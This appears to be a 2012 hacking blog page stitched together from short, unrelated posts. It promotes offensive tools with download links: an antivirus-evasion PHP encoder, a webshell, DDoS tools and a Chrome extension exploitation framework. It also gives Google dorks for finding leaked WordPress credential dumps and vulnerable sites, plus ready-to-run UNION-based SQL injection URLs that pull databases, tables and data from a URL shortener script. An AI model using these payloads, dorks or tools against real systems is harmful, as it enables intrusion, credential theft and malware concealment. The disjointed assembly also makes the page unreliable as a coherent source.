Dork:
intext:INSERT INTO 'wp_users` VALUES(1, 'ADMIN'," intext:dump filetype:sql

NotepadCrypt is a simple text editor based on Notepad2 with the added option of encrypting the contents of the files it edits. Except when opening and saving files, refer to Notepad2's documention. Nothing has been changed. If you read or write unencrypted files, nothing has been changed. If you open an encrypted file, NotepadCrypt will prompt you for the passphrase. When you save a new version of the file, it will be automatically encrypted using the same passphrase. There is one new item on the file menu, "Set Encryption PassPhrase" which will let you change or remove the encryption.

Download
http://www.andromeda.com/people/ddyer/notepad/NotepadCrypt2.0.15.zip

Carbylamine PHP Encoder is a PHP Encoder for obfuscating/encoding PHP files so that antivirus detection signatures can be bypassed. High Security PHP Encoder Stops unauthorized personnel from reading, modifying and reverse engineering your code.

Download
http://pastebin.com/ac8r3q81

by
Prakhar Prasad

12309.php is advanced webshell with the main aim at executing shell commands in all possible ways. it has some additional functions though.


Download
https://github.com/kairn/12309.php

Here some of preinstalled apps:

- ParolaPass Password Generator
- Find Host IP
- Anonymous HOIC
- Ddosim
- Pyloris
- Slowloris
- TorsHammer
- Sqlmap
- Havij
- Sql Poison
- Admin Finder
- John the Ripper
- Hash Identifier
- Tor
- XChat IRC
- Pidgin
- Vidalia
- Polipo
- JonDo
- i2p
- Wireshark
- Zenmap
…and more

Including Broadcom BCM43xx wireless driver.

Download
http://sourceforge.net/projects/anonymous-os/

CANAPE is a network testing tool for arbitrary protocols, but specifically designed for binary ones. It contains code to implement standard network proxies and provide the user the ability to capture and modify traffic to and from a server.The core can be extended through multiple .NET programming languages to parse protocols as required and implement custom proxies.Canape was released during Blackhat Europe 2012 where Context presented Canape with a worked example against Citrix ICA.

Info
http://www.contextis.co.uk/research/white-papers/blackhat2012/BlackHat%202012%20-%20CANAPE%20and%20Citrix%20ICA%20Whitepaper.pdf

Download
http://www.contextis.co.uk/research/tools/canape/download/Canape%20Version%201.msi

Software Link:
http://www.volusion.com/
Google Dorks:
inurl:livechat.aspx?ID= intext:volusion or intext:powered by volusion

by
Sony

This is a Chrome Extension Exploitation Framework - think BeEF for Chrome extensions. Whenever you encounter a XSS vulnerability in Chrome extension, ChEF will ease the exploitation.

What can you actually do:

Monitor open tabs of victims
Execute JS on every tab (global XSS)
Extract HTML, read/write cookies (also httpOnly), localStorage
Get and manipulate browser history
Stay persistent until whole browser is closed (or even futher if you can persist in extensions' localStorage)
Make screenshot of victims window
Further exploit e.g. via attaching BeEF hooks, keyloggers etc.
Explore filesystem through file:// protocol
Bypass Chrome extensions content script sandbox to interact directly with page JS

Download
https://github.com/koto/xsschef

Back in December of last year when Anonymous hacked into security think tank Stratfor, one of its claims was the theft of 200GB worth of data, including e-mails and client credit information.

Now, the FBI saying that between December 6, 2011 in February 2012, “at least $700,000 worth of unauthorized charges were made to credit card accounts that were among those stolen during the hack”.

This issue covers following articles:-

0x00 Tech Gyan - Network Security
0x01 Tool Gyan - Who wants to be a Millionaire
0x02 Mom's Guide - Protect your privacy online with ’TOR’
0x03 Legal Gyan - Section 66A - Sending offensive or false messages
0x04 Matriux Vibhag - EtherApe – Graphical Network Monitoring
0x05 Poster

Download PDF
http://chmag.in/issue/mar2012.pdf

Google dork: “Powered by Coppermine Photo Gallery”

POC: http://[localhost]/Patch/upload.php

File:
jpg, xlx, txt, bmp, doc, mp4, etc

by
fikri-badboy

Download
http://www.mediafire.com/?49wcc4536sviksq

Less than two weeks after Google launched Pwnium, a competition for hackers to find security exploits in Chrome, the search giant has announced its first winner.

The winner, Sergey Glazunov, was the first to submit an entry in Google's Pwniumcompetition to find security exploits in Chrome.

Info
https://plus.google.com/u/0/116651741222993143554/posts/5Eq5d9XgFqs

URL Shortener Script 1.0 SQL Injection Vulnerability
http://www.exploit-db.com/exploits/17937/

SQL Injection cheat sheets -
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
http://ha.ckers.org/sqlinjection/

How to : Create a simple url shortener script is a few minutes
http://djpate.com/2009/08/09/how-to-create-a-simple-url-shortener-script-is-a...

Exploit-DB URL: http://www.exploit-db.com/exploits/17937/

Getting Databases: http://www.service.com/shortURL/show.php?id=1234.5 union all select (select+concat(unhex(Hex(cast(schema_name+as+char)))) from information_schema.schemata limit LIMIT1,LIMIT2)--

Getting tables: http://www.service.com/shortURL/show.php?id=1234.5 union all select (select concat(unhex(Hex(cast(group_concat(table_name) as char)))) from information_schema.tables where table_schema=TABLE_INDIRECT)--

Getting columns: http://www.service.com/shortURL/show.php?id=1234.5 union all select (select concat(unhex(Hex(cast(group_concat(column_name) as char)))) from information_schema.columns where table_schema=DATABASE_NAME and table_name=TABLE_NAME)--

Getting Data: http://www.service.com/shortURL/show.php?id=1234.5 union all select (select concat(TABLE.COLUMN) from DATABASE.TABLE Order by COLUMN limit 0,1) --

Vanguard is a comprehensive web penetration testing tool written in Perl that identifies vulnerabilities in web applications. It is an another addition in open source web penetration testing community.
Web penetration tests:

SQL injection (This test is signature free!)
LDAP Injection
XSS
File inclusion
Command Injection


Download
http://www.blackhatacademy.org/releases/vanguard-public.tgz

Bugtraq is a distribution based on the 2.6.38 kernel has a wide range of penetration and forensic tools. Bugtraq can install from a Live DVD or USB drive, the distribution is customized to the last package, configured and updated the kernel and the kernel has been patched for better performance and to recognize a variety of hardware, including wireless injection patches pentesting other distributions do not recognize.
Some of the special features that you can appreciate are:
Administrative improvements of the system for better management of services.
Expanded the range of recognition for injection wireless drivers.
Patching the kernel 2.6.38 to recognize 4 gigs of RAM in 32-bit.
Tools perfectly configured, automated installation scripts and tools like Nessus, OpenVAS, Greenbone, Nod32, Hashcat, Avira, BitDefender, ClamAV, Avast, AVG, etc...
Unique Scripts from Bugtraq-Team (SVN updates tools, delete tracks, backdoors, Spyder-sql, etc.)
Stability and performance optimized: Enhanced performance flash and java and start purging unnecessary services. So that the user can use only the services you really want.
It has incorporated the creation of the user in the installation, which is created with all system configurations.
We are the distribution and Forensic Pentesting with more tools built and functional, well organized menu without repetition of the same to avoid overwhelming the user.

Download
http://bugtraq-team.com/index.php/en/descargas-2